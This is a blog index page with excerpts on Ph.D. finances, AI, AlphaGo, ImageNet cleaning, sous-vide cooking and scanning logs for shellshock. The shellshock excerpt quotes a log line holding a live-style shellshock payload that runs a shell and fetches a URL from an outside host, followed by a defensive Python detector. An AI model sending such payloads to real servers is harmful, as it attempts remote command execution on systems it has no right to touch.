Posts

Finances for CS Ph.D. students

This post is based upon a few recent conversations I've had with my own Ph.D. students.  Its intended audience is Ph.D. students at mid-to-upper-end computer science programs in the United States who either are U.S. citizens or permanent residents, or plan to remain and retire in the U.S.

Welcome to graduate school in computer science, where not only do we not charge you tuition, but we shower you with so much money that you can afford to eat, keep a roof over your head, and wear shirts that have fewer than five holes in them!

In fact, you can probably do better than that, and get a nice head start toward financial independence.  But it takes some advance planning.

Why Bother?
Mostly, because flexibility -- or, more crassly, "FU Money."  (You can google that in case the meaning isn't obvious.)  Getting started early on the path to financial independence lets you be in charge of your life.  You may also discover halfway through your program that there's this crazy nonp…

Don't quit that programming career yet because of AI

A recent Wired article breathlessly predicted the end of code:
Soon We Won’t Program Computers. We’ll Train Them Like Dogs

Of course, this is the same magazine that declared in 2010 that The Web is Dead.  So perhaps we should step back and think before throwing in the towel.  Have you looked at a self-driving car recently?

In this simplified diagram blatantly stolen from Google, there's a laser scanner, a radar, a compass, speed sensors - missing are the cameras, the engine computer, the onboard computers, the cellular uplinks, the data recorders, the onboard entertainment system (which will hopefully get even more use when the driver gets to play also).  And the backup systems, which are often redundantly engineered and even separately programmed to avoid coordinated failure.  Each of these devices has substantial embedded firmware, plus per-device processing to control it and make sense of the data it generates.

Oh, and that car depends on Google'…

Indirect shellshock security scanning via other people's logfiles

One of my friends noted that he'd spotted a shellshock-style user-agent string in his web log files, looking like:

24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;fetch -/dev/null http://closettransfer.com/IPTRANSITTEST'"
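A probe like this is easy to pick out of a log automatically, because a shellshock payload starts with a bash function definition, `() {`.  Here is a minimal sketch, assuming the log is in the common Apache/nginx "combined" format.  The function name, the regular expressions, and the shortened sample line are my own illustration, not anything from the original scan:

```python
import re

# Assumed layout: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_PATTERN = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)

# Shellshock payloads begin with a bash function definition: "() {"
SHELLSHOCK_MARKER = re.compile(r'\(\)\s*\{')

# URLs the payload tries to fetch (stop at whitespace, quotes, or ';')
URL_PATTERN = re.compile(r"https?://[^\s;'\"]+")


def find_shellshock_probe(line):
    """Return details of a shellshock-style probe in one log line, or None."""
    match = LOG_PATTERN.match(line.strip())
    if match is None:
        return None  # not in the assumed log format
    agent = match.group("agent")
    if not SHELLSHOCK_MARKER.search(agent):
        return None  # ordinary user agent
    return {
        "ip": match.group("ip"),
        "status": int(match.group("status")),
        "urls": sorted(set(URL_PATTERN.findall(agent))),
    }


# Shortened version of the log line above (only the first wget is kept).
SAMPLE_LINE = (
    '24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" '
    '"() { :; }; /bin/sh -c \'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null\'"'
)

probe = find_shellshock_probe(SAMPLE_LINE)
if probe is not None:
    print(probe["ip"], probe["status"], probe["urls"])
```

This only inspects the user-agent field; the same marker can show up in other headers such as the referer, so a more thorough scan would check those too.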

Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name:

Seasonally-appropriate designer labels.  Doesn't really seem like the kind of thing a white-hat security scanner would be pretending to be.  Was the domain compromised, and should I try to notify them? Hmm.  What the heck - try to download the page:

 --2016-04-30 13:38:26--  http://closettransfer.com/IPTRANSITTEST
Resolving closettransfer.com (closettrans…

Stealing Google's Coding Practices for Academia

I'm spending the year in Google's Visiting Faculty program.  I had a few goals for my experience here:

Learn learn learn!  I hoped to get a different perspective from the inside of the largest collection of computing & distributed systems that the world has ever seen, and to learn enough about machine learning to think better about providing systems support for it.  I haven't been disappointed.

Do some real engineering.  I spend most of my time as a faculty member teaching & mentoring my Ph.D. students in research.  I love this - it's terribly fun and working with fantastic students is an incredibly rewarding experience.  But I also get a lot of creative satisfaction from coding, and I can only carve out a bit of my faculty time to dedicate to it.  I haven't written large amounts of production code since I was 21 - and the world has changed a lot since then.

Contribute something useful to Google while I was here.  They're paying my salary for the time I&…

AlphaGo is a triumph for humanity

... and not something to be afraid of.

As anyone who hasn't been hiding under a rock knows, Google DeepMind's AlphaGo program decisively won its third game in a row against grandmaster Lee Sedol.

First of all, I argue that we shouldn't find this surprising:  We're still riding the exponential wave of the growth of computing power in hardware, and when that's coupled with significant software advances such as deep neural networks, we get great things.  Go, despite its massive positional complexity, is still the kind of thing that computers excel at:  It has a precisely defined objective and rules, it admits a fairly compact representation, and it exists entirely within the world of bits.

Second, I argue that this is an excellent excuse for all of humanity to pat itself on the back.  Consider what went into the AlphaGo victory:

The Nature paper version of AlphaGo is noted to have used 1202 CPUs and 176 GPUs.  The details are vague, but for our purposes don't matter. …

Cleaning the ImageNet Dataset, collected notes

As part of my sabbatical at Google, I spent the last month working on processing images from the ImageNet Large Scale Visual Recognition Challenge (ILSVRC 2012) dataset using TensorFlow.  (Note that I've linked to the '14 dataset because it contains the image blacklist I discuss below, but it has the same classification images as the '12 dataset.)

As is well known (there's an entire subreddit dedicated to it), cleaning data before feeding it into a machine learning system is both time-consuming and somewhat annoying.  Despite being a curated "challenge" dataset, it turns out that ILSVRC'12 needs cleaning as well.  Much of this is known already among people who use the dataset, but with the recent explosion in popularity of machine and deep learning, I figured I'd put my collected notes here to save others the time.

Without further ado, the ILSVRC 2014 Data Gotchas:
Images in the wrong format: (1)  Unlike each of its ~million peers, Image …

Vegan sous-vide recipes #1

Sous vide immersion cookers (I use the Anova) have become cheap and easily available - under $200, clamp on to the side of your pot, life is happy.  The Internet abounds with tales of meat cooked for hours until perfectly tender;  eggs cooked to perfection in a dozen ways.  But what about our dear vegetable friends?

I'm keeping a little journal of my journey through sous vide veggies - hope it's useful!
The Wins Thus Far
The biggest win has been ... starchy roots!

Following Kenji @ The Food Lab's suggestion, I threw three sweet potatoes, three potatoes, and three large beets in individual bags for about 2h at 150F.  After that, I removed them from their bags, cut them into small dice, and roasted them at 350F for about 45 minutes, tossed with a mix of salt, MSG, Better Than Bouillon no-chicken base, and canola oil.  Fantastic!  The two hours at 150F really bring out the natural sweetness of the roots, and the results had great happiness.

A surprising benefit of this a…